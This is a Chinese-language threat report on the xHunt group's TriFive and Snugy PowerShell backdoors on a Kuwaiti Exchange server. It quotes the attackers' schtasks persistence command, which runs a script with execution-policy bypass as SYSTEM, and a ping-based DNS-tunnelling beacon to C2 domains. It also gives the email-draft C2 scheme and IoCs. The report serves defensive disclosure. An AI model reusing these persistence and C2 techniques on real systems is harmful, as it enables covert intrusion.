TriFive和Snugy后門的示例分析

這篇文章將為大家詳細(xì)講解有關(guān)TriFive和Snugy后門的示例分析，小編覺得挺實用的，因此分享給大家做個參考，希望大家閱讀完這篇文章后可以有所收獲。

寫在前面的話

xHunt活動從2018年7月份一直活躍至今，這個組織的主要目標(biāo)針對的是科威特政府和航運運輸組織。近期研究人員發(fā)現(xiàn)，xHunt的攻擊者又攻擊了科威特一家機(jī)構(gòu)的Microsoft Exchange服務(wù)器。雖然我們無法確認(rèn)攻擊者是如何入侵這臺Exchange服務(wù)器的，但是根據(jù)此次事件相關(guān)的計劃任務(wù)創(chuàng)建時間戳，我們發(fā)現(xiàn)攻擊者早在2019年8月22日之前就已經(jīng)能夠訪問這臺Exchange服務(wù)器了。在此活動中，攻擊者使用了兩個后門，一個是TriFive，另一個是Snugy的變種版本（這是一個Web Shell，我們稱之為BumbleBee）。

TriFive和Snugy后門本質(zhì)上是PowerShell腳本，可以幫助攻擊者訪問被入侵的Exchange服務(wù)器，并使用不同的C2信道來進(jìn)行通信。TriFive后門使用的是一個基于電子郵件的信道，這個信道可以使用Exchange Web服務(wù)（EWS）在被入侵的電子郵件帳號的已刪除郵件夾中創(chuàng)建郵件草稿。Snugy后門則使用的是DNS隧道來實現(xiàn)命令控制。

TriFive和Snugy后門

在2020年9月份，我們發(fā)現(xiàn)xHunt攻擊者入侵了科威特的一家機(jī)構(gòu)組織。該組織的Exchange服務(wù)器上出現(xiàn)了通過IIS進(jìn)程w3wp.exe執(zhí)行可以命令的行為。攻擊者在發(fā)送這些命令時，使用的是一個被稱為BumbleBee的Web Shell，它已經(jīng)被安裝在了受感染的Exchange服務(wù)器。我們在分析服務(wù)器日志時，發(fā)現(xiàn)了兩個由攻擊者創(chuàng)建的計劃任務(wù)，這兩個任務(wù)都會運行惡意的PowerShell腳本。我們現(xiàn)在還無法確定攻擊者是否使用了這些PowerShell腳本中的任何一個來安裝webshell，但是我們相信攻擊者在日志記錄事件之前就已經(jīng)訪問過這臺Exchange服務(wù)器了。

攻擊者在這臺Exchange服務(wù)器上創(chuàng)建了兩個任務(wù)，即ResolutionHosts和ResolutionHosts，這兩個任務(wù)都是在c:\Windows\System32\tasks\Microsoft\Windows\WDI文件夾中創(chuàng)建的。默認(rèn)情況下，該文件夾在Windows系統(tǒng)上還存儲一個合法的ResolutionHost任務(wù)，具體如下圖所示。合法的ResolutionHost任務(wù)與Windows診斷基礎(chǔ)結(jié)構(gòu)（WDI）解析主機(jī)關(guān)聯(lián)，它主要用于為系統(tǒng)上出現(xiàn)的問題提供交互式故障排除。我們認(rèn)為，攻擊者選擇這個任務(wù)名稱主要是為了隱藏自己的攻擊活動。

在2019年8月28日和2019年10月22日，攻擊者創(chuàng)建了ResolutionHosts和ResolutionHosts任務(wù)，以運行兩個獨立的基于PowerShell的后門。攻擊者使用這兩個調(diào)度任務(wù)作為持久性方法，因為計劃任務(wù)會反復(fù)運行這兩個PowerShell腳本，不過運行的時間間隔不同。下圖顯示的是這兩個任務(wù)及其相關(guān)的創(chuàng)建時間、運行間隔和執(zhí)行的命令。這兩個任務(wù)執(zhí)行的命令將嘗試運行splwow64.ps1和OfficeIntegrator.ps1，分別是我們稱之為TriFive的后門和CASHY200的變種（我們稱之為Snugy）。這些腳本存儲在系統(tǒng)上的兩個單獨的文件夾中，這很可能是為了避免兩個后門都被發(fā)現(xiàn)和刪除。

上圖還顯示，TriFive后門每5分鐘運行一次，而Snugy后門每30分鐘運行一次。我們無法確認(rèn)間隔時間差異背后的確切原因，但可能與后門相關(guān)的C2通道的隱蔽性有關(guān)。比如說，Snugy使用DNS隧道作為C2信道，因此它的間隔可能比TriFive長，與TriFive使用的基于電子郵件的C2信道相比，Snugy使用的是一個更加明顯的C2信道，因此被檢測到的可能性更高。

我們現(xiàn)在還無法確認(rèn)攻擊者是如何創(chuàng)建ResolutionHosts和ResolutionHosts任務(wù)的。但是，我們知道攻擊者在其他系統(tǒng)上安裝Snugy樣本時，攻擊者使用的是批處理腳本來創(chuàng)建名為SystemDataProvider和CacheTask的計劃任務(wù)。比如說，下面的批處理腳本將創(chuàng)建并運行名為SystemDataProvider的計劃任務(wù)，并最終運行名為xpsrchvw.ps1的Snugy樣本：

schtasks /create /sc MINUTE /mo 5 /tn “\Microsoft\Windows\SideShow\SystemDataProvider” /tr “powershell -exec bypass -file C:\Windows\Temp\xpsrchvw.ps1” /ru SYSTEM & schtasks /run /tn “\Microsoft\Windows\SideShow\SystemDataProvider”

TriFive后門

TriFive是一個以前從未被發(fā)現(xiàn)過的PowerShell后門，xHunt的攻擊者會在受感染的Exchange服務(wù)器上安裝這個后門，并通過一個計劃任務(wù)每五分鐘執(zhí)行一次。TriFive通過登錄合法用戶的收件箱并從“已刪除郵件”文件夾中的電子郵件草稿中獲取PowerShell腳本，從而提供了對Exchange服務(wù)器的持久化后門訪問。TriFive樣本使用了目標(biāo)組織的合法帳戶名和憑據(jù)，這也表明在安裝TriFive后門之前，攻擊者已成功竊取了目標(biāo)的賬戶憑證。

事實上，基于電子郵件的C2也在Hisoka工具中使用過，雖然Hisoka工具使用電子郵件草稿發(fā)送和接收數(shù)據(jù)，但這些草稿仍保留在草稿文件夾中，而TriFive后門則專門將其電子郵件草稿保存到“已刪除郵件”文件夾中。

為了向后門發(fā)出命令，攻擊者需要登錄到同一個合法的電子郵件帳戶并創(chuàng)建一個主題為555的電子郵件草稿，其中就包括了加密和Base64編碼格式的命令。下圖顯示的一封包含演示命令的郵件，主題為555，郵件內(nèi)容為woFyeWt3cw==，該腳本將通過PowerShell執(zhí)行：

為了運行攻擊者提供的命令，PowerShell腳本需要登錄到Exchange服務(wù)器上的合法電子郵件帳戶，并檢查“已刪除郵件”文件夾中主題為555的電子郵件。腳本將打開電子郵件草稿，并使用Base64解碼電子郵件消息正文中的內(nèi)容，然后通過從每個字符中減去10來解密解碼命令內(nèi)容。然后，腳本會使用PowerShell的內(nèi)置Invoke Expression（iex）cmdlet來生成明文內(nèi)容。在執(zhí)行提供的PowerShell代碼之后，腳本將對結(jié)果進(jìn)行加密，方法是在每個字符上加10，并對密文進(jìn)行Base64編碼。接下來，TriFive會將命令結(jié)果發(fā)送給攻擊者，并將編碼的密文設(shè)置為電子郵件草稿的消息體，它將保存在主題為555的“已刪除郵件”文件夾中。下圖顯示了TriFive腳本創(chuàng)建的“已刪除郵件”文件夾中的一個電子郵件草稿樣例，它會將命令的運行結(jié)果以主題為555，消息內(nèi)容為“bQB5AHgAfgB5AH0AeQBmAGsAbgB3AHMAeABzAH0AfgB8AGsAfgB5AHwA”的郵件進(jìn)行發(fā)送。

TriFive PowerShell腳本并不是通過代碼循環(huán)來實現(xiàn)持久化運行的，而是通過前面提到的ResolutionsHosts調(diào)度任務(wù)來實現(xiàn)其持久化操作。

Snugy后門

我們在ResolutionHosts任務(wù)中看到的OfficeIntegrator.ps1文件是一個基于PowerShell的后門，我們將其稱之為Snugy，它將允許攻擊者獲取目標(biāo)系統(tǒng)的主機(jī)名并執(zhí)行命令。Snugy是CASHY200后門的一個變種版本，攻擊者也曾在之前的xHunt活動中使用過這個后門。在2019年7月，趨勢科技曾為這個后門創(chuàng)建過檢測簽名-Backdoor.PS1.NETERO.A，這也表明CASHY200的這個特殊變種已經(jīng)存在一年多了。

Snugy樣本會隨機(jī)選擇下列域名來作為其C2域名：

hotsoft[.]icu

uplearn[.]top

lidarcc[.]icu

deman1[.]icu

跟CASHY200后門的早期變種版本類似，Snugy變種將使用下列命令來跟自定義域名連接，并嘗試在將ICMP請求發(fā)送到解析IP地址之前解析該域：

cmd /c ping -n 1 <custom crafted sub-domain>.<C2 domain>

Snugy將使用下列正則表達(dá)式來從ping命令的結(jié)果中提取出IP地址：

\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b

下面給出的是Snugy后門的命令處理服務(wù)器：

Snugy創(chuàng)建的子域名包含一個通信類型字段，該字段定義了數(shù)據(jù)字段中元素的順序，下面給出是C2域名結(jié)構(gòu)：

<character for communication type><character for order of fields in data section><data section>.<C2 domain>

跟xHunt有關(guān)的基礎(chǔ)設(shè)施

入侵威脅指標(biāo)IoC

TriFive樣本：

407e5fe4f6977dd27bc0050b2ee8f04b398e9bd28edd9d4604b782a945f8120f

Snugy樣本：

c18985a949cada3b41919c2da274e0ffa6e2c8c9fb45bade55c1e3b6ee9e1393   6c13084f213416089beec7d49f0ef40fea3d28207047385dda4599517b56e127   efaa5a87afbb18fc63dbf4527ca34b6d376f14414aa1e7eb962485c45bf38372 a4a0ec94dd681c030d66e879ff475ca76668acc46545bbaff49b20e17683f99c

Snugy C2域名：

deman1[.]icu

hotsoft[.]icu

uplearn[.]top

lidarcc[.]icu

sharepoint-web[.]com

計劃任務(wù)名稱：

ResolutionHosts

ResolutionsHosts

SystemDataProvider

CacheTask-

關(guān)于“TriFive和Snugy后門的示例分析”這篇文章就分享到這里了，希望以上內(nèi)容可以對大家有一定的幫助，使各位可以學(xué)到更多知識，如果覺得文章不錯，請把它分享出去讓更多的人看到。